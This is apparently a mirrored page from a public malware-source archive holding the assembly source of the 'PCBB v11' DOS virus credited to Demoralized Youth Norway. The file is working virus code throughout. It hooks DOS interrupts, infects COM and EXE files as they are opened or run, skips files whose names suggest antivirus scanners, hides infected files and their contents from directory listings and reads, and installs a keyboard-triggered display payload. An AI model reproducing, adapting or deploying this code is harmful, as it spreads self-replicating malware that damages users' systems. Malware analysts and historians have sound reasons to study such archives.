mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-25 19:45:06 +00:00
1428 lines
41 KiB
NASM
1428 lines
41 KiB
NASM
|
sec equ 28
|
|||
|
ideal equ 3*1024 ;every file will increase by this ammount of bytes
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۲<EFBFBD><DBB2>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
Ver equ 11
|
|||
|
;
|
|||
|
|
|||
|
cpt1 equ $ ;Checkpoint 1
|
|||
|
|
|||
|
enc_start equ $
|
|||
|
org 100h
|
|||
|
call dummyjmp1
|
|||
|
|
|||
|
marker db 0 ;com / exe marker (0=com, 1=exe)
|
|||
|
|
|||
|
dummyjmp1: pop bx
|
|||
|
|
|||
|
cmp byte [bx],0
|
|||
|
je is_a_com
|
|||
|
|
|||
|
mov ax,es
|
|||
|
add ax,0
|
|||
|
exe_cpt1 equ $-2
|
|||
|
push ax
|
|||
|
mov ax,0
|
|||
|
exe_cpt2 equ $-2
|
|||
|
push ax
|
|||
|
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
jmp cont_install
|
|||
|
|
|||
|
is_a_com:
|
|||
|
push cs
|
|||
|
mov ax,100h
|
|||
|
push ax
|
|||
|
|
|||
|
cont_install:
|
|||
|
push ds
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
call one_three
|
|||
|
|
|||
|
mov ax,0C001h
|
|||
|
mov bx,ax
|
|||
|
add ax,07DFFh
|
|||
|
|
|||
|
db 0EBh,01,0EBh
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 0E9h,1,0,0B8h
|
|||
|
|
|||
|
cmp bx,0D00Dh
|
|||
|
je startup_fail
|
|||
|
|
|||
|
call one_three
|
|||
|
|
|||
|
; cmp sp,-10h
|
|||
|
; jb startup_fail
|
|||
|
|
|||
|
mov ax,es
|
|||
|
dec ax
|
|||
|
mov es,ax
|
|||
|
cmp byte es:[0000h],'Z'
|
|||
|
jne startup_fail
|
|||
|
|
|||
|
mov ax,es:[0003h]
|
|||
|
sub ax,tsr_para
|
|||
|
jc startup_fail
|
|||
|
|
|||
|
mov es:[0003h],ax
|
|||
|
sub word ptr es:[0012h],tsr_para
|
|||
|
mov es,es:[0012h]
|
|||
|
|
|||
|
call one_three
|
|||
|
|
|||
|
call $+3
|
|||
|
|
|||
|
cpt3 equ $ ;Checkpoint 3
|
|||
|
|
|||
|
pop si
|
|||
|
sub si,(cpt3-cpt1)
|
|||
|
mov bx,si
|
|||
|
add si,(cpt4-cpt1)
|
|||
|
push cs
|
|||
|
push si
|
|||
|
|
|||
|
mov si,bx
|
|||
|
mov cx,offset total-100h
|
|||
|
mov di,100h
|
|||
|
push es
|
|||
|
rep movsb
|
|||
|
mov di,offset init
|
|||
|
push di
|
|||
|
|
|||
|
retf
|
|||
|
cpt4 equ $ ;Checkpoint 4
|
|||
|
|
|||
|
startup_fail:
|
|||
|
call $+3
|
|||
|
dummycpt1 equ $-offset marker
|
|||
|
sub ax,ax
|
|||
|
xor bx,bx
|
|||
|
sub cx,cx
|
|||
|
xor dx,dx
|
|||
|
xor di,di
|
|||
|
sub bp,bp
|
|||
|
pop si
|
|||
|
pop ds
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
cmp byte cs:[si-dummycpt1],1
|
|||
|
je file_is_exe
|
|||
|
|
|||
|
mov word [100h],20CDh
|
|||
|
rpl1 equ $-2
|
|||
|
mov byte [102h],90h
|
|||
|
rpl2 equ $-1
|
|||
|
|
|||
|
file_is_exe:
|
|||
|
sub si,si
|
|||
|
retf
|
|||
|
|
|||
|
cpt2 equ $ ;Checkpoint 2
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Data Area *
|
|||
|
;****************************************************************************
|
|||
|
|
|||
|
;sft equ 005Ch ;3Ah
|
|||
|
|
|||
|
ofs_scan_crc equ 0050h ;+3
|
|||
|
ofs_chk_ver equ 0053h ;+1 version number
|
|||
|
ofs_chk_size equ 0054h ;+2 version size
|
|||
|
ofs_chk_sig equ 0056h ;+4 signature
|
|||
|
|
|||
|
header equ 005Ah
|
|||
|
ofs_first_3 equ 005Ah ;+3 three first bytes in COM
|
|||
|
ofs_time equ 008Dh ;+2
|
|||
|
ofs_date equ 008Fh ;+2
|
|||
|
ofs_attr equ 0091h ;2
|
|||
|
|
|||
|
sft_attr equ 04h ;(byte)
|
|||
|
sft_time equ 0Dh ;(word)
|
|||
|
sft_date equ 0Fh ;(word)
|
|||
|
sft_size equ 11h ;(dword)
|
|||
|
|
|||
|
; ;CRC signature added by "SCAN /AV"
|
|||
|
;scan_sig db 0f0h,0fdh,0c5h,0aah,0ffh,0f0h
|
|||
|
|
|||
|
set_sgm: push cs
|
|||
|
push ds
|
|||
|
|
|||
|
|
|||
|
f_size dw 0
|
|||
|
bb_stat db 0
|
|||
|
cntr dw 0
|
|||
|
r_cntr dw 0,0
|
|||
|
|
|||
|
;;; DISK S. DATA ;;;
|
|||
|
x_first3 db ' '
|
|||
|
x_version db 0
|
|||
|
x_size dw 0
|
|||
|
x_sig db ' '
|
|||
|
|
|||
|
stat db 0
|
|||
|
stat2 db 0
|
|||
|
|
|||
|
handle dw 0
|
|||
|
|
|||
|
_handle dw 0
|
|||
|
;_dx dw 0
|
|||
|
;_ds dw 0
|
|||
|
_bytes dw 0
|
|||
|
val_len dw 0,0
|
|||
|
pos dw 0,0
|
|||
|
pos2 dw 0,0
|
|||
|
|
|||
|
append dw 0
|
|||
|
|
|||
|
stealth1st dw 0
|
|||
|
|
|||
|
;;;DISK S DATA ENDS;;;
|
|||
|
|
|||
|
;db 'Only The Good Die Young'
|
|||
|
|
|||
|
|
|||
|
jmp_to dw 0
|
|||
|
|
|||
|
push_all:
|
|||
|
pop cs:[jmp_to]
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push bp
|
|||
|
jmp cs:[jmp_to]
|
|||
|
|
|||
|
pop_all:
|
|||
|
pop cs:[jmp_to]
|
|||
|
pop bp
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
jmp cs:[jmp_to]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
handle_dir:
|
|||
|
popf
|
|||
|
call int21
|
|||
|
|
|||
|
pushf
|
|||
|
jnc back_handle_dir
|
|||
|
|
|||
|
; cmp ax,0
|
|||
|
; jne back_handle_dir
|
|||
|
|
|||
|
call stealth_dir_handle
|
|||
|
sti
|
|||
|
back_handle_dir:
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
fcb_dir:
|
|||
|
popf
|
|||
|
call int21
|
|||
|
|
|||
|
pushf
|
|||
|
cmp al,00h
|
|||
|
jne back_fcb_dir
|
|||
|
|
|||
|
call stealth_dir_fcb
|
|||
|
sti
|
|||
|
back_fcb_dir:
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Interupt 24 handler *
|
|||
|
;****************************************************************************
|
|||
|
ni24: mov al,3
|
|||
|
iret
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Call OLD Interrupt 21 Handler
|
|||
|
;****************************************************************************
|
|||
|
int21:
|
|||
|
pushf
|
|||
|
call dword ptr cs:org21
|
|||
|
ret
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Interupt 21 handler *
|
|||
|
;****************************************************************************
|
|||
|
ni21: pushf
|
|||
|
|
|||
|
;cmp ah,40h
|
|||
|
;je __read
|
|||
|
|
|||
|
;jmp no_fcb12 ;no_bogus
|
|||
|
|
|||
|
cmp ah,11h
|
|||
|
jne no_fcb11
|
|||
|
jmp fcb_dir
|
|||
|
no_fcb11:
|
|||
|
cmp ah,12h
|
|||
|
jne no_fcb12
|
|||
|
jmp fcb_dir
|
|||
|
no_fcb12:
|
|||
|
|
|||
|
jmp no_bogus
|
|||
|
|
|||
|
cmp ah,03Fh
|
|||
|
jne no_bogus
|
|||
|
__read: jmp _read
|
|||
|
|
|||
|
no_bogus:
|
|||
|
cmp ah,03Eh
|
|||
|
jne body
|
|||
|
cmp bx,0C001h
|
|||
|
|
|||
|
jne body
|
|||
|
mov bx,0D00Dh
|
|||
|
popf
|
|||
|
stc
|
|||
|
retf 2
|
|||
|
|
|||
|
o24 dw 0,0
|
|||
|
o13 dw 0,0
|
|||
|
|
|||
|
body:
|
|||
|
call push_all
|
|||
|
|
|||
|
push ax
|
|||
|
push ds
|
|||
|
push dx
|
|||
|
push es
|
|||
|
push bx
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
mov es,ax
|
|||
|
les bx,es:[24h*4]
|
|||
|
|
|||
|
mov cs:o24[0],bx
|
|||
|
mov cs:o24[2],es
|
|||
|
mov ax,2524h
|
|||
|
mov dx,offset ni24
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
call int21
|
|||
|
pop bx
|
|||
|
pop es
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
pop ax
|
|||
|
|
|||
|
|
|||
|
cmp ah,3Eh ;close ?
|
|||
|
jne vvv
|
|||
|
cmp bx,5
|
|||
|
jl exit
|
|||
|
|
|||
|
mov ah,45h ;duplicate handle
|
|||
|
jmp doit
|
|||
|
vvv: cmp ah,56h ;rename ?
|
|||
|
je dsdx
|
|||
|
cmp ah,43h ;chmod ?
|
|||
|
je dsdx
|
|||
|
cmp ah,3Dh
|
|||
|
jne not_open
|
|||
|
|
|||
|
call pas_wp
|
|||
|
not_open:
|
|||
|
; cmp ah,3Dh ;open ?
|
|||
|
; je dsdx
|
|||
|
cmp ax,4B00h ;execute ?
|
|||
|
jne exit
|
|||
|
|
|||
|
dsdx: mov ax,3D00h ;open the file
|
|||
|
doit: call int21
|
|||
|
jc exit
|
|||
|
xchg ax,bx
|
|||
|
jmp infect
|
|||
|
|
|||
|
exit:
|
|||
|
call reset_i24
|
|||
|
|
|||
|
glemmdet:
|
|||
|
call pop_all
|
|||
|
alfa:
|
|||
|
popf
|
|||
|
|
|||
|
db 0EAh ;JMP FAR xxxx:xxxx
|
|||
|
org21 dw 0,0
|
|||
|
|
|||
|
|
|||
|
avslussen: mov ah,4Ch
|
|||
|
int 21h
|
|||
|
|
|||
|
one_three:
|
|||
|
ret
|
|||
|
pushf
|
|||
|
push ax
|
|||
|
push ds
|
|||
|
push dx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
call $+3
|
|||
|
pop dx
|
|||
|
sub dx,($-1)-offset avslussen
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ax,2501h
|
|||
|
int 21h
|
|||
|
inc al
|
|||
|
inc al
|
|||
|
int 21h
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
db 'PCBB v11 (c) Hannibal Lechter of Demoralized Youth Norway'
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Try to stealth a HANDLE READ (3Fh)
|
|||
|
;****************************************************************************
|
|||
|
_read:
|
|||
|
cmp cs:stat,1
|
|||
|
je alfa
|
|||
|
mov cs:stat,1
|
|||
|
cmp bx,5
|
|||
|
jl alfa
|
|||
|
jcxz alfa
|
|||
|
|
|||
|
mov cs:stat2,0
|
|||
|
call read
|
|||
|
cmp cs:stat2,0
|
|||
|
je back2
|
|||
|
|
|||
|
popf
|
|||
|
pushf
|
|||
|
call dword ptr cs:org21
|
|||
|
jc back3
|
|||
|
|
|||
|
pushf
|
|||
|
call push_all
|
|||
|
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov bx,pos[0]
|
|||
|
mov cx,stealth1st[0]
|
|||
|
|
|||
|
mov di,dx
|
|||
|
add di,bx
|
|||
|
mov si,offset header ;x_first3
|
|||
|
add si,bx
|
|||
|
|
|||
|
cld
|
|||
|
first_b2:
|
|||
|
movsb
|
|||
|
dec cx
|
|||
|
jcxz first_b1
|
|||
|
inc bx
|
|||
|
cmp bx,24
|
|||
|
jl first_b2
|
|||
|
first_b1:
|
|||
|
call pop_all
|
|||
|
popf
|
|||
|
back3:
|
|||
|
mov cs:stat,0
|
|||
|
mov cs:stat2,0
|
|||
|
iret
|
|||
|
back2:
|
|||
|
mov cs:stat,0
|
|||
|
mov cs:stat2,0
|
|||
|
jmp alfa
|
|||
|
|
|||
|
;****************************************************************************
|
|||
|
;* Close the file
|
|||
|
;****************************************************************************
|
|||
|
close:
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
|
|||
|
mov ax,5701h
|
|||
|
mov cx,word cs:[ofs_time]
|
|||
|
mov dx,word cs:[ofs_date]
|
|||
|
call int21
|
|||
|
|
|||
|
; mov al,byte cs:[ofs_attr]
|
|||
|
; mov byte [di+4],al
|
|||
|
|
|||
|
; mov ax,4301h
|
|||
|
; mov cx,word cs:[ofs_attr]
|
|||
|
; call int21
|
|||
|
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
|
|||
|
mov ah,3Eh
|
|||
|
call int21
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;db 'Now I lay me down to sleep, I pray the lord my soul to keep, If I die before '
|
|||
|
;db 'I wake, I pray the lord my soul to take'
|
|||
|
|
|||
|
infect: cld
|
|||
|
|
|||
|
mov cs:handle,bx
|
|||
|
|
|||
|
mov ax,5700h
|
|||
|
int 21h
|
|||
|
mov word cs:[ofs_time],cx
|
|||
|
mov word cs:[ofs_date],dx
|
|||
|
|
|||
|
|
|||
|
;start NOP'ing here...
|
|||
|
; push es
|
|||
|
; push bx
|
|||
|
;
|
|||
|
; mov ax,3513h
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; mov cs:o13[0],bx
|
|||
|
; mov cs:o13[2],es
|
|||
|
;
|
|||
|
; mov ah,13h
|
|||
|
; int 2Fh
|
|||
|
; push es
|
|||
|
; push bx
|
|||
|
; int 2Fh
|
|||
|
; pop dx
|
|||
|
; pop ds
|
|||
|
; mov ax,2513h
|
|||
|
; int 21h
|
|||
|
;
|
|||
|
; pop bx
|
|||
|
; pop es
|
|||
|
;
|
|||
|
;stop NOP'ing here...
|
|||
|
|
|||
|
mov ax,1220h ;get file-table entry
|
|||
|
push bx
|
|||
|
push ax
|
|||
|
int 2Fh
|
|||
|
mov bl,es:[di]
|
|||
|
pop ax
|
|||
|
sub al,0Ah
|
|||
|
int 2Fh
|
|||
|
pop bx
|
|||
|
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
|
|||
|
push [di+2] ;save attr & open-mode
|
|||
|
push [di+4]
|
|||
|
|
|||
|
mov al,[di+4]
|
|||
|
mov byte cs:[ofs_attr],al
|
|||
|
|
|||
|
cmp word [di+sft_size+2],0
|
|||
|
jne close1v
|
|||
|
mov ax,word [di+sft_size]
|
|||
|
cmp ah,0F0h
|
|||
|
ja close1v
|
|||
|
cmp ah,0
|
|||
|
jl close1v
|
|||
|
|
|||
|
mov cs:f_size,ax
|
|||
|
|
|||
|
cmp word ptr [di+28h],'XE'
|
|||
|
jne not_exe
|
|||
|
cmp word ptr [di+2Ah],'E'
|
|||
|
je check_name
|
|||
|
|
|||
|
not_exe: cmp word ptr [di+28h],'OC'
|
|||
|
jne close1v ;jne
|
|||
|
cmp byte ptr [di+2Ah],'M'
|
|||
|
check: je check_name
|
|||
|
close1v: jmp close1
|
|||
|
|
|||
|
check_name: cmp byte ptr [di+20h],'V' ;name is V*.* ?
|
|||
|
je close1v
|
|||
|
cmp byte ptr [di+20h],'F' ;name is F*.* ?
|
|||
|
je close1v
|
|||
|
|
|||
|
mov cx,7 ;name is *SC*.* ?
|
|||
|
mov ax,'CS'
|
|||
|
push di
|
|||
|
add di,21h
|
|||
|
cld
|
|||
|
SCloop: dec di
|
|||
|
scasw
|
|||
|
loopnz SCloop
|
|||
|
pop di
|
|||
|
je close1v
|
|||
|
|
|||
|
mov byte ptr [di+2],2 ;open for read/write
|
|||
|
mov byte ptr [di+4],0 ;clear attributes
|
|||
|
|
|||
|
cld
|
|||
|
jmp read_info
|
|||
|
_call1:
|
|||
|
jc close2
|
|||
|
; push [di+0Dh]
|
|||
|
; push [di+0Fh]
|
|||
|
|
|||
|
jmp patch_it
|
|||
|
_call0:
|
|||
|
; pop [di+0Fh]
|
|||
|
; pop [di+0Dh]
|
|||
|
close2:
|
|||
|
|
|||
|
push es ;close after infection
|
|||
|
pop ds
|
|||
|
|
|||
|
or byte ptr [di+6],40h ;no time-change
|
|||
|
|
|||
|
; pop [di+4]
|
|||
|
; pop [di+2]
|
|||
|
; push [di+2]
|
|||
|
; push [di+4]
|
|||
|
|
|||
|
close1: call close ;normal close
|
|||
|
|
|||
|
or byte ptr [di+5],40h ;no EOF on next close
|
|||
|
pop [di+4] ;restore attribute & open-mode
|
|||
|
pop [di+2]
|
|||
|
|
|||
|
;start NOP
|
|||
|
; lds dx,cs:o13[0]
|
|||
|
; mov ax,2513h
|
|||
|
; call int21
|
|||
|
;stop NOP
|
|||
|
|
|||
|
|
|||
|
jmp exit
|
|||
|
|
|||
|
read_info:
|
|||
|
push ds
|
|||
|
|
|||
|
push ds ;(ds)
|
|||
|
pop es
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,3Fh
|
|||
|
mov cx,18h
|
|||
|
mov dx,ofs_first_3
|
|||
|
call int21
|
|||
|
jc failed
|
|||
|
cmp al,18h
|
|||
|
jne failed
|
|||
|
|
|||
|
xchg cx,ax
|
|||
|
shr cx,1
|
|||
|
mov si,ofs_first_3
|
|||
|
mov di,offset dummy
|
|||
|
|
|||
|
encr_l8b:
|
|||
|
lodsw
|
|||
|
xor ax,'IF'
|
|||
|
xor ax,'HS'
|
|||
|
xor ax,'W&'
|
|||
|
xor ax,'AH'
|
|||
|
xor ax,'EL'
|
|||
|
mov [di],ax
|
|||
|
inc di
|
|||
|
inc di
|
|||
|
loop encr_l8b
|
|||
|
|
|||
|
mov ax,4202h
|
|||
|
mov cx,-1
|
|||
|
mov dx,-10
|
|||
|
call int21
|
|||
|
jc failed
|
|||
|
|
|||
|
mov ah,3Fh
|
|||
|
mov cx,10
|
|||
|
mov dx,ofs_scan_crc
|
|||
|
call int21
|
|||
|
jc failed
|
|||
|
cmp al,10
|
|||
|
jne failed
|
|||
|
|
|||
|
mov ax,word ptr [ofs_first_3]
|
|||
|
not ax
|
|||
|
|
|||
|
cmp word ptr [ofs_chk_sig],'CP' ;is word [EOF-4] = 'PC' ?
|
|||
|
jne not_infected
|
|||
|
cmp word ptr [ofs_chk_sig+2],'BB' ;is word [EOF-2] = 'BB' ?
|
|||
|
jne not_infected
|
|||
|
jmp failed
|
|||
|
|
|||
|
not_infected:
|
|||
|
pop ds
|
|||
|
clc
|
|||
|
jmp _call1
|
|||
|
failed:
|
|||
|
pop ds
|
|||
|
stc
|
|||
|
jmp _call1
|
|||
|
|
|||
|
;db 13,10
|
|||
|
;db "Whoe to you of earth and sea...",13,10
|
|||
|
;db "For the devil sends the beast with wrath,",13,10
|
|||
|
;db "Because he knows the time is short...",13,10
|
|||
|
;db "The people who have understanding,",13,10
|
|||
|
;db "Reckon the number of the beast,",13,10
|
|||
|
;db "Because it is a secret number...",13,10
|
|||
|
;db "It's number is six-hundred and sixty-six!",13,10,36
|
|||
|
|
|||
|
db 'When you are demoralized.... there is NO way out!',13,10,36
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> Keyboard (Int 09h) Handler <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
key_rout:
|
|||
|
pushf
|
|||
|
|
|||
|
inc cs:r_cntr[0]
|
|||
|
adc cs:r_cntr[2],0
|
|||
|
|
|||
|
inc cs:cntr
|
|||
|
cmp cs:cntr,offset total
|
|||
|
jl key_b1
|
|||
|
mov cs:bb_stat,1
|
|||
|
mov cs:cntr,0
|
|||
|
key_b1:
|
|||
|
cmp cs:bb_stat,0
|
|||
|
je key_b2
|
|||
|
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov al,byte ptr [417h]
|
|||
|
and al,15
|
|||
|
cmp al,15
|
|||
|
jne key_b3
|
|||
|
|
|||
|
mov cs:bb_stat,0
|
|||
|
|
|||
|
mov dx,3DAh
|
|||
|
in al,dx
|
|||
|
mov dx,3BAh
|
|||
|
in al,dx
|
|||
|
mov dx,3C0h
|
|||
|
mov al,20h
|
|||
|
out dx,al
|
|||
|
key_b3:
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
key_b2:
|
|||
|
popf
|
|||
|
|
|||
|
db 0EAh
|
|||
|
old_key dw 0,0 ;old KBD vector
|
|||
|
|
|||
|
|
|||
|
